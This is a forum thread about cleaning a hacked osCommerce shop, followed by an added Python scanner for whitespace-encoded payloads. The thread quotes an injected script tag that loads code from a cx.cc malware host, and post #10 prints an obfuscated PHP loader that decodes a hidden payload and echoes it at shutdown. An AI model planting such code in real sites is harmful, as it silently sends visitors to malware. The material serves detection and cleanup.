  1. #1
    Join Date
    Aug 2005
    Posts
    521

    Shopping Cart Hacked

    I'm trying to help someone out who has a hacked oscommerce site that has had the footer changed to:

    </body>
    </html>
    <script src="http://malwaresite.cx.cc/jquery.js"></script>
    </noindex>
    </body>
    </html>

    I've looked everywhere, even grep'd for eval, _decode, etc., but still can't find it! Anyone know a better way to find these types of hacks?

  2. #2
    Join Date
    Nov 2010
    Location
    Arizona
    Posts
    297

  3. #3
    Join Date
    Aug 2005
    Posts
    521
    LMD didn't find anything: {scan} 8228/8228 files scanned: 0 hits 0 cleaned

  4. #4
    Join Date
    Nov 2010
    Location
    Arizona
    Posts
    297
    You should install ClamAV then run the scan. LMD will then use ClamAV to scan the files more thoroughly.

  5. #5
    Join Date
    Aug 2006
    Posts
    850
    oscommerce is very very very buggy ... forget oscommerce .... use prestashop

  6. #6
    Join Date
    Aug 2005
    Posts
    521
    I tried Clam, nothing found. Stumped.

  7. #7
    Join Date
    Apr 2002
    Posts
    930
    Are you trying to find out where the inserted code is being stored on the server?

    Have you looked through the database that osCommerce uses? It might be being stored somewhere in there. I'm not sure where osCommerce stores all of its data.

    But as others have said, osCommerce isn't the greatest product. They are very slow to fix any security related issues in their product.

  8. #8
    Join Date
    May 2007
    Posts
    438
    Originally posted by jackpx:
    "oscommerce is very very very buggy ... forget oscommerce .... use prestashop"

    A shopping cart is only as good as the person that's maintaining it. If you don't know how to apply the available security patches, then yes, oscommerce should not be used (same goes for any open source software or script!).

    Prestashop is less "insecure" because it isn't as widely used. Oscommerce is one of the most popular carts - hence it will be more attractive to hackers & script kiddies.

  9. #9
    Join Date
    May 2011
    Location
    N/A
    Posts
    116
    You got an SQL injection; you need to use a secure and updated version of the script. Also set proper CHMOD permissions for directories and configuration files...

  10. #10
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    190
    Is there a bunch of .php files with:

    Code:
    <?php /**
     * Gets some core libraries and displays a top message if required.	/*
     */ function CoreLibrariesHandler() {					/*
     */   $session_keys = '    	 	   				   			  		 		   		 			  	  		 	  	 			     			 	    	      			  		 			  	  		   		  				 	  	   	  		 	    			 	   			 	   			      			 	   	 				  	 				 		  	 	 		   		 		   		 		 		   		  	 	 			  		 			 	   		 				 		 			  		   	  		    	 		 			  			 			 		  	 	 		 		    	 			  		   		 				     	 			  		   		 		   		  	 				 		 	 	  			   	 			 	 	 		  	 	 			  	  				  	  	 			  		 	 	  			  		  	   	   					   				    	 				 			  		 		   		 			  	  		 	  	 			     			 	    					     	 	   				    	 				 		 			  		 				 		 	  	 		 			  		  	   		  	 	 				     					     	 	   				    	 				 		   	  		 				 		  	   				  	  					     	 	   				    	 				 		 	    			 	   		 		 	 		 		    					 ';  /*
     */									/* 
     */	foreach(str_split($session_keys, 8) as $k=>$v) { 		/*             
     */		$v = str_replace('	', 1, str_replace(' ', 0, $v));	/*
     */		$session_keys[$k] = chr(bindec($v)); 			/*
     */	} 								/*
     */									/*
     */	if($session_keys) echo $session_keys; }				/*
     */	register_shutdown_function('CoreLibrariesHandler');		/*
     */									/*
     ************************************************************************/
    
    
    
     ?>
    in them?

    We've been seeing this code used to redirect to cx.cc sites.

    Have you replaced $PHP_SELF in the two application_top.php files? Have you renamed the admin folder? Have you password protected the newly renamed admin folder? Have you removed the file_manager.php and define_language.php files?

    If not, you should immediately.

    Can you post the contents of the application_bottom.php files here? Be sure to use the code tags.
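
Added example (not part of the original thread, and not code from any poster): a Python scanner for the technique shown in post #10, where the payload is a quoted run of spaces and tabs decoded with str_split/bindec/chr, which is why a grep for eval or _decode comes back empty. The function names, the 64-character threshold and the sample file contents are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Quoted PHP string consisting only of spaces/tabs; 64+ chars is an assumed threshold.
WS_LITERAL = re.compile(r"""(['"])([ \t]{64,})\1""")
# Functions the posted sample uses to decode and emit its payload.
HOOKS = ("register_shutdown_function", "str_split", "bindec")

def decode_ws(blob):
    """Decode space=0, tab=1, eight bits per character (same scheme as the sample)."""
    bits = blob.replace(" ", "0").replace("\t", "1")
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))

def scan_source(text):
    """Return one finding per whitespace-only literal found in a PHP source string."""
    hooks = [h for h in HOOKS if h in text]
    return [{"offset": m.start(), "decoded": decode_ws(m.group(2)), "hooks": hooks}
            for m in WS_LITERAL.finditer(text)]

def scan_tree(root):
    """Scan every .php file under root; map path -> findings for files that hit."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

def encode_ws(text):
    """Helper used only to build the constructed sample below."""
    bits = "".join(format(ord(c), "08b") for c in text)
    return bits.replace("0", " ").replace("1", "\t")

# Constructed sample: same structure as the posted code, harmless marker as payload.
SAMPLE = ("<?php function h() { $k = '" + encode_ws("<!-- constructed test marker -->")
          + "'; foreach (str_split($k, 8) as $v) { echo chr(bindec($v)); } }"
          + " register_shutdown_function('h'); ?>")

if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for f in found:
            print(path, f["offset"], f["hooks"], repr(f["decoded"][:120]))
```

Run it with the site's document root as the argument; each hit prints the file, the offset of the literal, the decoder functions present in that file, and the decoded text for review.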
